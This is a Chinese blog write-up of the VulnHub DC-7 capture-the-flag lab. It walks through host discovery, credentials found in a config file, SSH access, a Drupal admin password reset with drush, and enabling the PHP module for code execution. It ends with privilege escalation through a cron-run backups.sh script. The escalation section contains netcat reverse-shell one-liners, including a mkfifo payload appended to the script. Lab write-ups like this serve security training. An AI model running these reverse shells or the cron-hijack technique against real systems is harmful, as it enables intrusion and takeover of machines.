DC-7--vulnhub靶场

本文介绍了在Vulnhub上的DC-7靶场攻防演练过程,包括主机发现、网站信息收集、利用SSH登录及通过定时任务进行提权的详细步骤。在网站源码中找到的账号密码无法直接登录,但成功通过SSH接入,并发现一个具有提权可能的定时备份任务。最终,通过分析和利用backups.sh脚本,实现了权限提升。
摘要由CSDN通过智能技术生成

靶机:http://www.five86.com/downloads/DC-7.zip
网络模式:NAT

1.主机发现

arp-scan -l

192.168.194.167

nmap -p- -A 192.168.194.167  

22/tcp open ssh
80/tcp open http

2.网站信息收集

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在下面
在这里插入图片描述
在代码config.php中找到一个账号密码
在这里插入图片描述

$username = “dc7user”;
$password = “MdR3xOgB7#dW”;

在robots.txt中,发现登录界面路径

在这里插入图片描述

在这里插入图片描述
用之前的账号密码登不了,想起还有个22端口的ssh,试试,可以
在这里插入图片描述
查看mbox
虽然很长,但是内容基本重复,可以得到的信息是存在一个定时任务,备份数据库文件,参考
在这里插入图片描述

cat /opt/scripts/backups.sh

在这里插入图片描述
www-data 具有权限,需要获取相应shell,再利用backups.sh提权
在这里插入图片描述

drush 命令可以修改密码

drush user-password admin --password="123456"

在这里插入图片描述

3.登录网站

在这里插入图片描述

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

在这里插入图片描述
在这里插入图片描述
折叠查找更快

在这里插入图片描述
在这里插入图片描述
可以写php文件了

在这里插入图片描述

在这里插入图片描述
路径为首页
在这里插入图片描述

4.定时任务提权

nc -e /bin/bash 192.168.194.156 7777
nc -lvvp 7777

利用backups.sh文件提权

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.194.156 6666 >/tmp/f" >> backups.sh

在这里插入图片描述
另一个终端监听
在这里插入图片描述
通过邮件的时间可以得知该脚本每15分钟执行一次

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值